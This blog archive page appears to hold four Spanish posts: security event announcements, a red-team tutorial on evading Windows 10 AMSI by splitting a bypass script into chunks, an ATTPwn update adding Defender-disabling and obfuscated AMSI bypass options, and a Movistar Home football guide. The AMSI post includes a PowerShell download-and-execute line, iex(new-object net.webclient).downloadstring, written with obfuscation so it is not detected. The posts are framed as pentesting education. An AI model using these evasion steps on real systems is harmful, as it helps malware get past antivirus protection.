miércoles, octubre 21, 2020

Semana Cibersegura: Participo en 3 eventos online de ciberseguridad y tenemos un curso online de forense digital y respuesta a incidentes

La semana que viene tenemos tres citas con la formación en ciberseguridad que se pueden seguir online, por lo que os las comparto por si os apetece conectaros a ellas, o haceros un curso online que suba tu nivel de conocimientos en ciberseguridad y técnicas de análisis forense. Estas son las tres que tengo en el radar.

Figura 1: Semana Cibersegura: Participo en 3 eventos online de ciberseguridad y tenemos un curso online de forense digital y respuesta a incidentes

La primera de las citas es en inglés y será conmigo. La segunda de las citas es una formación online en HackBySecurity que se va a impartir por primera vez. La tercera cita será en la 8.8 de Chile. Y la última es un evento online gratuito pero con plazas limitadas, así que si quieres participar debes darte prisa. 

26 Octubre: Blade Runner World is here and Gone en la Connect Univiersity

El día 26 de octubre, de 14:00 a 15:00 horas daré una charla online dentro del Mes de la Ciberseguridad en la Unión Europea. Será una sesión en inglés en la Connect University y hablaré de Ciberseguridad hoy en día.  Si quieres apuntarte, tienes toda la información en el siguiente enlace, donde el título de la charla es "Blade Runner World is here and gone", que ya sabéis que 2019, el año en que se ambientaba la mítica película ya paso....


27 de Octubre: Curso Online de Digital Forensic & Incident Response

Esta no es una conferencia, y tampoco es en inglés. Es un curso online dedicado a la disciplina de Análisis Forense tanto para el peritaje judicial como para la gestión de los incidentes y su respuesta. El curso lo imparten los profesionales de HackBySecurity y cuenta con un temario formado por doce módulos que recorren los principales temas a conocer por todo buen analista forense.


El curso tiene como complemento a la formación el libro de 0xWord escrito por Pilar Vila, llamado "Técnicas de Análisis Forense para Peritos Judiciales profesionales". Pilar Vila, recientemente, ha sido nominada recientemente a los premios European Women Legal Tech 2020 por su trayectoria profesional.

Figura 4: "Técnicas de Análisis Forense Informático para Peritos Judiciales Profesionales"
Libro de Pilar Vila en 0xWord para todos los alumnos.

Además, todos los alumnos tienen incluidos 200 Tempos de MyPublicInbox que pueden utilizar para contactar con cualquier Perfil Público y de la plataforma - incluida Pilar Vila -, y los que utilicen el Código: OCTUBRE tendrán un 30 % de descuento en la formación.

28 a 31 de Octubre: 8.8 Legends Online Edition (Chile)

De miércoles a sábado de la semana que viene, también tendrá lugar la 8.8 de Chile. Una cita obligada anual en el panorama del hacking y la ciberseguridad. Este año los ponentes son un elenco variado de figuras como Jack Daniels, Nina Allí, Raoul Chiesa, el gran César Cerrudo, Gabriel Bergel o la Susana González, por citar algunos.


Yo daré mi charla el día 30 a las 14:00 de la tarde hora española, pero os prometo que aún no he decidido de qué voy a hablar. Así que espero que si venís a verla sea porque tenéis confianza ciega en que contaré algo que os guste. 


Además, para el cartel de este año nos hicieron unos dibujos muy chulos. Esta es la ilustración que hicieron de mí. Maravilloso el artista.

30 de Octubre: Trans Atlantic Cibersecurity Summit 2020 (TACS 2020)

Para acabar el mes de octubre, tenemos la 4ª Edición anual de este encuentro, en esta ocasión se hace especial mención a las capacidades defensivas en un periodo hostil con numerosos desafíos que las organizaciones privadas y públicas deben afrontar en el presente periodo. 


Los riesgos digitales asociados a los ciberataques afectan a sectores críticos para nuestra sociedad: industriales, logísticos, administraciones públicas, además de sectores privados que prestan servicios para entornos sensibles, en los que la confidencialidad es un requisito indispensable para operar. Y yo participaré en la apertura con una pequeña entrevista. 


Después, tenemos una jornada presentada por Monica Valle, en la que además estarán Igor Lukic, Leandro Naranjo, Marcelo Vázquez, la Dra. Ofelia Tejerina que es la Presidenta de la Asociación de Internautas, Jaime Álvarez y Juan Flores, además del ponente misterioso que cierra la jornada.

Dará una conferencia en el TACS y participará en la mesa de debate.

Tres actividades para terminar el mes de la ciberseguridad, y si estás pensando en hacer un Máster de Cibersseguridad, criptografía, inteligencia u otra disciplina en seguridad informática con título por la universidad, recuerda que tienes los del Campus Internacional de Ciberseguridad que van a dar comienzo en Marzo.

Saludos Malignos!

martes, octubre 20, 2020

Hacking Windows10: Troceando scripts para lograr el bypass de AMSI

Desde hace ya tiempo hemos trabajado con el sistema AMSI (Anti Malware Scan Interface) de Windows 10 para entenderlo, conocerlo y en lo que podamos, mejorar su funcionamiento descubriendo sus límites. Desde luego que es una protección más que interesante y que permite detectar ciertas instrucciones maliciosas en lenguajes de scripting como Javascript, Powershell o VBS antes de que sean ejecutadas. Es una forma de llegar donde el antivirus (AV) no puede llegar o, mejor dicho, de enterarse lo que pasa en un proceso cuando el AV no puede enterarse “per se”.

Figura 1: Hacking Windows10: Troceando scripts para lograr el bypass de AMSI

En Ideas Locas hemos llevado a cabo la creación de la herramienta ATTPwn, de la que ayer os contábamos las novedades de la nueva versión, y en la que pusimos mucho “cariño”. Esta herramienta de emulación de amenazas nos ha permitido enfrentarnos con el juego del gato y del ratón que presenta AMSI, como cualquier otra protección. Ya hemos hablado en el blog de estas cosas como, por ejemplo, con el artículo de ofuscación, bypass manual y AMSI.fail.


Trabajando últimamente con ATTPwn y mostrándolo en diversas conferencias nos hemos dado cuenta de la rapidez con la que AMSI ayuda a detectar ATTPwn o la consola que es el código de inicio en Powershell. Si estudiamos a Metasploit y el módulo web_delivery con su opción de Powershell podemos ver que, en las nuevas versiones, se ejecuta primero un bypass para AMSI, si estás en Windows 10, y posteriormente se ejecuta el Meterpreter o payload que hayas configurado.

Figura 3: Metasploit para Pentesters Gold Edition

Esto no es más que un ejemplo de la necesidad hoy en día de conocer las posibilidades de bypassear un AMSI en un Ethical Hacking y, lo más importante, ser capaces de modificar cualquier tipo de script que haga un bypass de AMSI para que, una vez detectado, podamos hacerlo de nuevo “indetectable”. De esto vamos a hablar en este artículo.

Cuando tu código de Powershell orientado a Pentesting es detectado

Cuando un código que hacía algo importante para tu Ethical Hacking es detectado por un AV, gracias a la implementación en ese proceso de AMSI, es un “problema”. ¿Qué podemos revisar? Sabemos que si ofuscamos el código puede que el AV no lo detecte como malicioso, pero ¿tengo más opciones? Sí. En la imagen se puede ver la consola de ATTPwn siendo detectada por AMSI.

Figura 4: Consola de ATTPwn detectada por AMSI 

Podemos abrir un ISE Powershell y comprobar paso a paso qué es lo que funciona y qué es lo que es detectado. Esto nos permite tener una primera visión del problema. Es una forma de aislar y acotar el problema. Pensemos que si tengo un script de 10 líneas y lo ejecuto sin más y es detectado, tengo que dividir el problema. Recuerda “divide y vencerás”. Mi script de 10 líneas puede ejecutarse en una Powershell de 2 líneas en 2 líneas. Si ejecuto las 2 primeras líneas y todo va bien, significa que AMSI no se “queja”. Podemos reducir el problema a:

1. Ejecuta 2 primeras líneas de mi script 10 de líneas.
2. Si todo va bien, ejecuto las siguientes 2.
3. Si todo va bien… así hasta llegar a las 10 líneas de mi script.
4. Si no se ha quejado y la funcionalidad se ha acabado ejecutando significa que puedo operar “troceando” la función o el script. Sin necesidad de ofuscar.

Si lo llevamos al plano de bypass de AMSI, nosotros nos encontramos con el problema de que la consola de ATTPwn era detectada y el usuario puede entender que la aplicación no funciona. No es cierto, es algo con lo que uno se debe enfrentar y dar solución. El usuario puede modificar el cómo se ejecuta dicho código, ofuscarlo, modificarlo, hacer lo que sea para evitar la protección. 

Figura 5: Libro de Pentesting con PowerShell 2ª Edición

Una estrategia para solventar el problema, que puede que en el futuro lo vuelvan a detectar, es la de trocear el bypass de AMSI de rasta-mouse, el cual está en ibombshell y en ATTPwn. El objetivo es evitar que esta función sea detectada por AMSI y ejecutarla. Posteriormente ejecutaríamos ATTPwn sobre un proceso sin AMSI, ¿Cómo lo haremos? Lo veremos un poco más adelante.

Figura 6: Deshabilitar envío de muestras en MS Windows Defender 

Una recomendación cuando se está “jugando” con todo esto es tener la máquina virtual sin conexión a Internet si no queremos que se actualicen las firmas y/o deshabilitar la subida de las muestras. Esto se puede hacer desde Windows Defender de forma sencilla, aunque si la máquina no tiene conexión a Internet nos valdría.

Utilizando un bypass “Classic” más lo que hemos aprendido

Ahora, vamos a ver cómo troceamos el script para que podamos hacer el bypass de AMSI y nuestra consola de ATTPwn no sea “cazada” como maliciosa. Antes de nada, hay que pensar en, si podríamos hacerlo con un bypass de “classic”. Es cierto que modificando la línea ‘iex(new-object net.webclient).downloadstring(‘[URL consola]’) y metiendo alguna concatenación de strings se puede lograr, si la detección está basada en la firma de la URL. En el caso de que sea por contenido de la función consola, así no lo lograremos.

Figura 7: Parte 1 del script

La mentalidad de la estrategia es “una vez ejecutado algo, ya está ejecutado, sigamos leyendo”. Esto quiere decir que, basándonos en el apartado anterior, podemos trocear la función de bypass de AMSI de rasta-mouse e invocarla lo primero. Una vez ejecutada, podremos ejecutar la consola sin problema. Vamos a ello.

Figura 8: Parte 2 del script

Lo primero es ver que tenemos 5 ficheros *.ps1 . En cada fichero tenemos un trozo de función de bypass de AMSI. El tercer fichero el código “troceado” lo puedes ver aquí.

Figura 9: Parte 3 del script

Ahora viene un problema con el que nos enfrentamos. Quisimos dividir de menos, es decir, en el fichero 4 queríamos terminar el bypass de AMSI y ejecutar la consola de ATTPwn. ¿Qué ocurrió? 

Figura 10: Intentando abrir la consola en la parte 4 del script 

En la Figura 10 puedes ver el código que hicimos, pero si probamos a ejecutar los scripts, veremos que el truco aquí no funcionará, tal como se ve en la imagen siguiente.

Figura 11: Fallo en la ejecución de la parte 4 

Era demasiado pronto, ya que la instrucción de descarga de la consola se detectaba como malicioso. Quizá con una concatenación de strings en la URL se arregle, pero mejor no dividir de menos.

Figura 12: Parte 4 del script, correcta. 

Así quedaría el fichero 4.ps1 y el fichero 5.ps1. Cada uno en su parcela para ver si podemos saltarnos el AMSI con este troceado.

Figura 13: Parte 5 del script 

La idea es ir ejecutando cada uno por separado, de modo que AMSI solo evaluará los ficheros que correspondan. Recordando lo de “una vez ejecutado, ejecutado queda” pues si el fichero 1.ps1 es evaluado como no malicioso y ejecutamos ese trozo, digamos que el AV no tiene memoria de lo que has ejecutado previamente. 

Figura 14: Ejecución de la función byp4ss

En ATTPwn hay una función que te devuelve una función, la que le pidas, para ser ejecutada. Esta función es “givemefunction”. De esta forma, directamente, se puede pedir una función y ser ejecutada antes de empezar con el flujo normal de una consola de ATTPwn que pide un plan de amenaza a emular. Recapitulando tenemos:

- 5 “snippets” de código que sumados ejecutan el bypass de AMSI 
- Un fichero llamado byp4ss que almacena la llamada iex(new-object net'.'webclient).downloadstring([URL]) a cada “snippet” de código. 
 
- El 5 fragmento de código es el de la llamada a la consola de ATTPwn. 
 
- Los 4 primeros fragmentos se irán ejecutando y la suma es el bypass de AMSI.

Cabe destacar que tanto la llamada de la función byp4ss como las realizadas dentro de ella, hasta lograr el bypass de AMSI, son realizadas con una ofuscación mínima pero necesaria para hacer posible la ejecución de dicho bypass. Se puede ver en el entrecomillado del punto en iex(new-object net'.'webclient).downloadstring([URL])

Figura 15: Resultados sin y con una ofuscación mínima para lanzar el bypass

Es una técnica que podréis utilizar en diversos Ethical Hacking o ejercicios de Red Team ya que los resultados son bastante buenos. Otra vía, como se ha dicho en este artículo es ir por la ofuscación. Es otra opción. Sea como sea, ya tienes disponible en la última versión de ATTPwn, la 0.2.1, la posibilidad de crear el código de warrior de esta forma, para “asegurarte” el bypass de AMSI en un entorno Windows 10, Windows Server 2016/2019

Saludos,  

Autores:

Luis E. Álvarezdesarrollador y miembro del equipo Ideas Locas CDCO de Telefónica.

Figura 16: Contactar con Luis Eduardo Álvarez en MyPublicInbox

Pablo González Pérez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Hacking con Metasploit: Advanced Pentesting" "Hacking Windows", "Ethical Hacking", "Got Root",  “Pentesting con Powershell”, "Pentesting con Kali Silver Edition" y de "Empire: Hacking Avanzado en el Red Team", Microsoft MVP en Seguridad y Security Researcher en el equipo de "Ideas Locas" de la unidad CDCO de Telefónica.  Para consultas puedes usar el Buzón Público para contactar con Pablo González - Conseguir 100 Tempos Gratis en MyPublicInbox

Figura 17: Contactar con Pablo González

lunes, octubre 19, 2020

Actualización ATTPwn: Versión 0.2.1 Novedades en funcionalidades

En el artículo de hoy os mostraremos cómo agregar una función en el framework ATTPwn para la emulación de adversarios, de forma sencilla, y explicaremos algunas de las novedades que trae esta nueva versión 0.2.1 que ya puedes descargar desde su repositorio en GitHub. No son muchas las novedades, que ya sabéis que nuestra preferencia es llevar un ciclo de desarrollo rápido y con liberación de versiones cortas, pero esperamos que os sean relevantes y útiles.

Figura 1: Actualización ATTPwn: Versión 0.2.1 Novedades en funcionalidades

Aunque ya os mostrábamos en otro artículo anterior cómo añadir vuestros propios scripts a ATTPwn no había posibilidad de añadir estos scripts directamente desde la interfaz gráfica. Es por ello por lo que hemos implementado esta nueva funcionalidad para dotar así a la comunidad de la facilidad de poder contribuir de manera cómoda con la herramienta. Esta nueva opción está dentro de la vista ATT&CK, donde ahora tienes "Add Implementations" junto al botón de “View Implementations”.

Figura 2: View Implementations y Add Implementations en el GUI de ATTPwn

Cuando hagamos clic en el botón de la opción "Add Implementations", veremos la vista para añadir fácilmente la nueva funcionalidad que queramos, y así dotar de más inteligencia a la herramienta, probar nuevos scripts que estemos desarrollando y ver cómo funcionan encadenados a otras funciones o scripts

Figura 3: Opción de "Add Implementations"

La vista es muy similar a “View Implementations”, pero en este caso, se muestran todas las técnicas disponibles en la matriz de MITRE ATT&CK organizadas en función de la táctica. Podremos elegir el nombre de la “Técnica”, que será el nombre que recibirá el fichero que se guardará en la carpeta “functions” de la aplicación.

El "Check" representa la parte “lógica” que determina si el warrior se tendrá que dividir, bien sea por que tenemos una consola nueva, con privilegios elevados o un movimiento lateral, este hará que en el momento que termine la ejecución del script “muera” para que la siguiente consola pueda hacer el nuevo “HI” con el ID del warrior.

Para verificar que se ha creado nuestra función correctamente, podemos ir al apartado de “View Implementations” seleccionar la Táctica a la que pertenece y en las Técnicas debería de aparecer el nombre de nuestro script.

Figura 4: Nuestra nueva "Técnica" importada

En nuestro caso vemos que el fichero que se muestra es el anteriormente creado, basándonos en el “skeleton file” para empezar con la estructura básica de nuestra función. También, podemos mejorar o cambiar el comportamiento de scripts, como es el caso de la técnica T1211 – Explotation for Defense Evasion – Disable defender bifurcated que vamos a ver a continuación.

Disable-Defender-Bifurcated:

La semana pasada subimos nuevas funciones al repositorio de Github de ATTPwn. Una de ellas Disable Realtime con el nombre de Disable Defender. Como ya explicamos en el anterior artículo, dicha función, permite al usuario evadir la protección del antivirus de Microsoft desactivando la protección en tiempo real si y solo si, la protección contra alteraciones está deshabilitada y la función se ha ejecutado en un entorno con privilegios de administrador.

Figura 5: Función Disable Defender Bifurcated 

Al utilizar esta técnica, sin un Bypass de AMSI persistente implementado previamente, el flujo de ejecución se podría ver afectado, ya que AMSI aun estando deshabilitado seguía monitorizando ese proceso. Por lo que en esta nueva reléase, hemos implementado la función Disable Realtime añadiendo una bifurcación del warrior que esté ejecutando el plan, para solventar el problema comentado de forma previa. Es decir, esta función creará un desdoblamiento del warrior en cuestión y seguirá con el flujo de trabajo previsto por el usuario. 

Nueva generación de código en la sección: Warriors.

Han pasado un par de semanas desde que subimos la anterior actualización de ATTPwn al repositorio de Github y escribíamos sobre las nuevas funcionalidades en el artículo anterior. Una de las “mejoras” para simplificar el uso de la herramienta es la generación del warrior. Para ello hemos decidido crear nuevos comandos, para poder disminuir el riesgo a ser detectados por la primera defensa a la hora de lanzar el comando en Powershell, una de las herramientas más potentes en el mundo del pentesting.

Figura 6: Libro de Pentesting con PowerShell (2ª Edición)
de Pablo González en 0xWord

El comando que generaba el warrior, era susceptible a ser “cazado” por AMSI por lo que hemos propuesto varias medidas para evitar que ocurra, si se os ocurre otra forma para tratar de minimizarlo podéis aportar estas ideas para hacer crecer la herramienta. A la hora de generar un warrior y ejecutar el código generado en la máquina que auditemos, puede que nos encontremos un mensaje parecido a este:

Figura 7: Error "Contenido malicioso al ejecutar el código generado"

Como solución a este posible error, hemos implementado distintos bypasses de AMSI a la hora de generar el código del warrior. Uno clásico y el otro persistente. Por lo que a la hora de generar un warrior tendremos tres opciones: la opción sin bypass, la opción ofuscada y la opción persistente.

Figura 6: Distintas opciones para generar un Warrior 

Ya os iremos contando en próximos artículos todo lo que vayamos añadiendo nosotros y los aportes que hace la comunidad a este proyecto. También, si tenéis una sugerencia para añadir, será más que bienvenida, así que hacédnosla llegar dejándonos comentarios.

Saludos,

Autores:

Luis E. Álvarez, desarrollador y miembro del equipo Ideas Locas CDCO de Telefónica.
Víctor Rodríguez Boyero, desarrollador y Security Researcher en el equipo de Ideas Locas de CDCO de Telefónica.

domingo, octubre 18, 2020

Cómo disfrutar del fútbol de La Liga con Movistar Home y las Living Apps de Movistar +

Que en Telefónica y Movistar tenemos una fuerte apuesta por el deporte es evidente. Si te gusta el fútbol Movistar + tiene la oferta más completa de competiciones de fútbol en España, además de tener la mejor oferta total de deportes. Así que no es de extrañar que desde el minuto uno en que empezamos a trabajar en Movistar Home y las Living Apps, el fútbol estuvo muy presente en el diseño de las experiencias. Hoy os quiero contar cómo es la experiencia que diseñamos, desde un punto de vista muy personal.

Figura 1: Cómo disfrutar del fútbol de La Liga con
Movistar Home y las Living Apps de Movistar +

Como ya os he contado, Mi Hacker me ha salido del Real Madrid y Mi Survivor del Atlético de Madrid. Así es la vida. Una vikinga, la otra colchonera. Y yo disfruto con las dos, que nunca he sido de ver enemigos en el deporte, así que las animo a que ellas sean del equipo que quieran. La verdad, yo he aprendido a querer a los dos equipos como son, tanto como al resto de los deportistas que admiro. No soy muy forofo.


Como Mi Survivor es del Atleti - cuando tenía 4 años decía "Gopa Atleti" -, le pedí hace tiempo que me dejara hacer un pequeño viral con Movistar Home y Mi Survivor, donde usamos la experiencia que estábamos diseñando para disfrutar el fútbol. Ahí, donde sale también mi querido Cálico Electrónico


Figura 3: OK Aura, pon la Supercopa

Hoy en día esa experiencia está mucho más expandida de cómo la diseñamos, y ayer, que jugaba el Atlético de Madrid fui tomando fotos para que entendáis cómo es todo el proceso.

Paso 1: La Living App del Atlético de Madrid

Si tienes Movistar Plus en tu casa, y tienes un descodificador UHD (Ultra HD), entonces tienes la experiencia de las Living Apps totalmente disponible. La única Living App que necesita por ahora un requesito extra es Smart WiFi que solo funciona con el router Smart WiFi, al que llamamos HGU (Home Gateway Unit), y que da las capacidades avanzadas de WiFi, la seguridad de Conexión Segura...y en breve opciones de aceleración para vídeo juegos - pero eso ya vendrá -. 


El caso, si te gusta el fútbol y quieres ver el partido del Atlético de Madrid, todas las semanas se actualiza la Living App del Atlético de Madrid con entrevistas e información de la semana. Solo tienes que ir a la sección Apps de Movistar + y abrir la Living App del Atlético de Madrid. O darle al Botón Aura de tu mando vocal y decir "Abre Atlético de Madrid", o desde Movistar Home decir "Ok Aura, Abre el Atlético de Madrid".

Figura 5: Esta semana el protagonista fue Luis Suárez

Así, antes del partido podrás ver la entrevista, la previa, y alguna información extra curiosa para entender mejor el partido de fútbol que vas a ver. Ahora, si te gusta Joaquín Sabina o Leiva, puedes ver el vídeo que han hecho de "Partido a partido", donde además todo el dinero que recauden va para la fundación y hacer campos de fútbol para fomentar el deporte en los más jóvenes. Preciosa iniciativa, preciosa canción.

Figura 6: El vídeo de Partido a Partido para entrar en ambiente

Así que, antes de que llegue el momento del partido, te puedes repasar el contenido de la Living App del Atlético de Madrid y tener información y contenido extra preparado para que vayas calentando el ambiente antes del partido.

Figura 7: La Living App del Atlético de Madrid controlada desde Movistar Home

Por supuesto, si tienes Movistar Home o el Mando Vocal Aura, puedes manejar la Living App del Atlético de Madrid con el mando dando a los botones, diciendo las opciones vocalmente con el botón Aura en el mando vocal, diciendo la opción a Aura en Movistar Home como "OK Aura Previa", o usando el menú táctil de la Living App del Atlético de Madrid en la pantalla de Movistar Home. Multicanalidad a tope gracias a la 4ª Plataforma y Aura.

Paso 2: Seguir a tus equipos favoritos en la Living App de La Liga en Movistar Home

Si tienes Movistar Home, tienes una integración de "Second Screen" diseñada con los ingenieros de La Liga para que la experiencia sea mucho mejor. En primer lugar, en las Preferencias de Movistar Home debes configurar las opciones de La Liga, para que puedas sacar el máximo de ella. Desde Movistar Home, desplaza el menú de configuración de arriba abajo, entra en Preferencias, y selecciona La Liga.

Figura 8: Selección de equipos a seguir

Lo único que debes decidir es qué dos equipos quieres seguir. Por supuesto, os podéis imaginar que en mi caso son el Real Madrid y el Atlético de Madrid, así que los tengo bien configurados en todo momento. Esto hace que desde Movistar Home tengas información actualizada en la Pantalla Principal cuando jueguen el Real Madrid o el Atlético de Madrid, o los equipos que tú hayas seleccionado.

Figura 9: La Liga me avisa en la Pantalla Principal que uno de los
equipos que he marcado en preferencias está en directo

Después, tienes un control total de los partidos de la jornada, la clasificación y las retransmisiones de los encuentros. Si ya sabes qué partido deseas ver di “OK Aura, quiero ver Celta - Atlético de Madrid”, por ejemplo, y accede al duelo en directo. Mientras vives la tensión del choque, puedes pedir a Aura que te muestre la clasificación con un “OK Aura, ir a Clasificación” o seleccionar la opción “Ir a Clasificación” en la pantalla de Movistar Home.  Todos los ejemplos de uso los tienes en este vídeo.


Figura 10: Living App de La Liga en Movistar Home

Si prefieres ver los horarios de las jornadas, di “OK Aura, ir a Horarios” o pulsa en “Ir a Horarios”. O simplemente pregunta, “OK Aura, ¿cuándo juega Atlético de Madrid?”. También puedes acceder al minuto a minuto de lo que está pasando en cada uno de los 90 minutos de partido con un “OK Aura, ver Resumen” o pulsando en “Ir a Resumen”. 

Paso 3: El día del partido con Aura y Movistar Home

Llegado el día del partido, puedes ver en la pantalla principal, como hemos visto antes, que todo está listo. Así que solo debes decirle a Aura "Pon Movistar LaLiga" en el mando vocal o, usando Movistar Home, decir "OK Aura pon Movistar LaLiga". Y se pondrá el partido directamente en la tele.

Figura 11: La Pantalla Principal nos indica que está en directo y cuál es
el comando para poner lo en la televisión para que no tengas que memorizarlos.

Así que, en mi caso, usando "OK Aura Pon Movistar LaLiga", puedes poner el partido en la televisión del tirón.  Esta es la primera experiencia que incluimos y que os habíamos contado en el vídeo que había hecho yo con Mi Survivor, que ahora, si tienes Movistar Home está totalmente evolucionada. Y mola mucho.

Figura 12: El contenido se manda a la Televisión de tu salón

Paso 3: Control del directo desde Movistar Home

Como se ha dicho antes, para poner el partido en la televisión solo tienes que invocar la orden de Aura que te aparece en pantalla, pero además, si tienes Movistar Home, puedes, si has llegado unos minutos tarde, o si quieres volver atrás en cualquier momento, controlar con tu dedo en la pantalla táctil el punto donde quieres ir de la retransmisión. 

Figura 13: Control del directo desde la pantalla táctil de Movistar Home

También puedes pausar el contenido y reanudarlo luego, ya que están integradas todas las opciones de Control de Directo que tiene Movistar +, que no son pocas. Eso sí, no podemos controlar que te enteres de los goles por los gritos de los vecinos, ya que esa capacidad necesita unas APIs que no tenemos aún.

Paso 4: Ver las estadísticas del partido en tiempo real en Movistar Home

En la última actualización hemos incluido, como ya os he dicho antes, la información en tiempo real desde La Liga, y tienes en Movistar Home los datos disponibles en todo momento. Solo necesitas abrir la Living App de La Liga en Movistar Home diciendo "OK Aura abre La Liga".

Figura 14: Abriendo la Living App de La Liga en Movistar Home

En ese momento puedes hacer scroll con el dedo en la pantalla táctil y ver todos los datos de posesión, faltas, goles, etcétera. Es decir, todo lo que quieras sobre lo que está pasando en el partido en cualquier momento.

Figura 15: Las estadísticas del partido en tiempo real

Con esto logras tener un "Vídeo Marcador" para ti solo en tu salón que te permite disfrutar del partido con todos los detalles y todos los datos.

Figura 16: Todos los detalles en tiempo real

Y está siempre en Second Screen disponible mientras sigues el partido en la televisión, es decir, está sincronizado con el partido de fútbol que estás viendo en la televisión en ese momento.

Paso 5: Comentarios e información en Twitter en Movistar Home

Pero también integramos Twitter en Movistar Home hace tiempo como una Living App, así que, si estás viendo el partido, Movistar Home te irá mostrando los comentarios más relevantes en Twitter en pantalla. 

Figura 17: Los comentarios en Twitter también los sigues en Movistar Home

Esta integración la contamos ya el año pasado, y Twitter hace un trabajo fantástico entregando esos mensajes revisados para que sean relevantes y útiles para disfrutar más la retransmisión del partido, pero no solo para el fútbol, sino para todos los deportes.

Este es el ejemplo de Twitter sirviendo los mensajes más relevantes de la semifinal de Roland Garros de Rafa Nadal y Schwartzman, que hacía que entre punto y punto controlaras qué pasaba por las redes sociales.

Paso 6: Pipas saladas y una cerveza artesana de Madrid

Esto aún no lo tenemos integrado, pero en breve cuando lancemos el eCommerce en que estamos trabajando en Movistar Plus ya verás que también podrás tener esto en casa. Por ahora, yo me compré una cerveza artesana IPA de Madrí y unas pipas con sal para ver el partido como se merece.

Figura 19: Una cerveza artesana IPA de Madrí

El resto, es tener suerte que tu equipo gane, que la emoción te haga disfrutar una tarde agradable y que haya merecido la pena la experiencia. Si pierde, pues hay otro partido más adelante, así que a mirar hacía el siguiente y volver a pelear.

Reflexión Final

Para terminar, al margen de las opciones de usabilidad y de las experiencias en sí, es una maravilla ver todo lo que ha habido que hacer y unir tecnológicamente. Los equipos de hardware en Telefónica haciendo el HGU, el Descodificador, el Mando Vocal y Movistar Home. Los equipos de Movistar + negociando los contenidos deportivos para que estén en la plataforma, gestionando una plataforma de televisión compleja que funciona IPTV, OTT, Satelital, y por donde te conectes. Creando las funciones y las APIs necesarias para que se puedan construir estas experiencias.

Los equipos de Aura haciendo los Intents en todos los canales, el equipo de Home as a Computer uniendo todo bajo una plataforma, los equipos de Living Apps internos de Telefónica, y de La Liga, el Atlético de Madrid y Twitter haciendo todas y cada una de las experiencias, creando las APIS, disponibilizando los datos en cada caso, y los socios tecnológicos como Microsoft con los equipos de Azure para ayudar que las experiencias fueran posibles.  


Figura 20: Partido a Partido de Leiva y Joaquín Sabina

Y por supuesto el equipo de producto en Digital Home, 4ª Plataforma, alianzas, de ingeniería de QA, marketing, comuniaciones, diseño y delivery de Movistar Home para hacer que versión a versión el número de experiencias sea mejor y de mayor calidad. A veces, hacer que algo parezca sencillo es tan complejo por detrás que cuesta expresarlo en un post de un blog que habla de funcionalidades. Han sido muchas semanas yendo "Partido a Partido".

Saludos Malignos!

Entrada destacada

ESET te consigue 100 Tempos de MyPublicInbox para consultar con los expertos de seguridad informática @eset_es @mypublicinbox1

La compañía de seguridad ESET , especializada en soluciones de seguridad personal y empresarial, ha puesto activa una campaña de concienciac...

Entradas populares